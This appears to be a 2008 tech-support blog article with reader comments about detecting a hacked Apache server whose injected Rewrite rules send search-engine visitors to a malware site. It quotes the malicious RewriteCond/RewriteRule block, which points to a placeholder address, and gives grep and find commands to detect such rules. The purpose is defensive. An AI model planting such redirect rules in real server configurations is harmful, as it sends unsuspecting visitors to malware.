
How can people hack my Apache server with Rewrite rules?A geeky friend of mine just told me that he's been seeing hackers slip a few lines of code into their Apache web server configuration and have all their traffic redirected to porn sites. Now I'm paranoid! How can I detect if this has happened to my own server? This happened to a pal of mine just a few days ago, actually, and at first we were convinced someone had hacked Google itself, because the symptoms were that when someone typed in his URL directly, they went to his site, but if they clicked on a search match on Google, they were redirected to a site that attempted to give you a virus. Digging around a bit, however, and chatting with various people on Twitter.com led us to suspect that there was something wonky with his server, not Google. I mean, in reality, it's pretty darn unlikely that someone's going to hack Google... Since the malicious redirect wasn't universally experienced, we knew that it couldn't be a DNS hijacking or similar (where your domain name is spontaneously assigned to the IP address of a porn site, etc). So it had to be something on the server itself. A bit of digging in the httpd.conf Apache web server configuration file revealed the offending code: RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://nefarious IP address/in.html?s=ipw2 [R,L] Errordocument 404 http://nefarious IP address/in.html?s=ipw2_err What this does is cause queries sent to the server with a referrer of Google, AOL, MSN, Altavista, Ask or Yahoo (e.g., the major search engines) have the query rewritten to be a redirect to the nefarious IP address URL. Definitely not good! But how to detect it? Well, one easy way is to just use the Unix/Linux command line tool "grep" to search and quickly view all rewrite rules in your configuration file, screening out those that don't also have "http:" in them. When I do that with my highly complex 2400-line server configuration, here's what I see: $ grep -i rewriterule /usr/local/apache/conf/httpd.conf | grep http:
RewriteRule ^/index.xml$ http://feeds.feedburner.com/AskDaveTaylor [R,L] RewriteRule ^/index.rdf$ http://feeds.feedburner.com/AskDaveTaylor [R,L] Those are both clean because it's how I let the popular Feedburner service catch my RSS feed URLs. Nothing suspicious like my friend had in his "httpd.conf" file. One more tweak and you could have a simple script that would email you if any of this bad code showed up if run from a cron job (Linux geeks know what I'm talking about): #!/bin/sh
conf=/usr/local/apache/conf/httpd.conf grep -i rewriterule $conf | grep http: | grep -v feedburner exit 0 Easy enough, right? Now it turns out that there's one more sneaky way that a hacker could slip this code onto your server: with a ".htaccess" file in the main directory or a subdirectory of your Web site itself, rather than in the central "httpd.conf" file. You can check for this from the command line again: $ cd /usr/local/apache/htdocs
find . -name ".htaccess" -print Before you panic on matches, realize that this is also how you most commonly password protect a directory on a Web server. In that instance, the file looks like this: AuthUserFile /etc/.htpasswd
AuthGroupFile /dev/null AuthName "Growing Your Biz w/ Google Course" AuthType Basic <Limit GET> require user taylor require user google require user steven </Limit> (You can learn more about password protecting Web site directories here: how to password protect a directory in Apache with .htaccess) Again, you can just look for the "http:" pattern, though this is a bit more complicated a command than last time: $ grep http: $(find . -name ".htaccess" -print)
$ Phew. I'm clean. You should check for this too. In fact, it might be a smart command to add to your simple admin script that I show above. Hope that helps you out! Many thanks to Greg Hughes for his help in isolating and sharing the dastardly code snippet shown above.
Help others find this article at Del.icio.us, Digg, Netscape, Reddit, and Stumble Upon
Categorized:
Blogs and RSS Feeds
(Article 8450)
Tagged: apache, hacking, http.conf, site hijacking Previous: What is eBay auction fever? Next: How can I wipe my old Apple iPhone clean of data? Subscribe!
Never miss another useful Q&A article again! Subscribe to AskDaveTaylor with Google Reader. Hi Dave, Great article - thanks. I agree with Paris; how are black hats getting into httpd.conf files or .htaccess files in the first place? SSH root access? Oh, and I also agree: it is otherwise a good article. Thanks. Posted by: Dave Cole at August 21, 2008 8:32 AMI add to the thanks for writing this. I also ask for the same additional info on how this can be stopped in the first place. I understand from some sites that poorly written PHP code can lead a person to discover the file structure, but if the sites are secure, how are they able to do anything with that info? What can we do to stop them from using bad code on a user's site against us the whole server? Posted by: Greg at November 18, 2008 1:37 PMI have a lot to say, but ...
I do have a comment, now that you mention it!
|
![]()
Search
Find just the answers you seek from among our 1700+ free tech support articles by using our Lijit search engine.
Help!
Subscribe to
Ask Dave Taylor!
Free Updates!
Sign up and get free weekly updates and special offers on books, seminars, workshops and more.
Articles and Reviews
Auctions and Online Shopping Blogs and RSS Feeds Building Web site traffic Business and Management Cell Phones and Mobile Phones CGI Scripts and Web Site Programming Computer and Internet Basics d) None of the Above HTML and CSS Mac OS X Help MySpace, Facebook, Twitter and Social Network Help Pay Per Click (PPC) Search Engine Optimization Shell Script Programming Sony PSP, MP3 Players, Etc. The Writing Business Unix and Linux Help Video Game Tips and Help Windows Help
Recent Entries
Join the List!
Book Links
|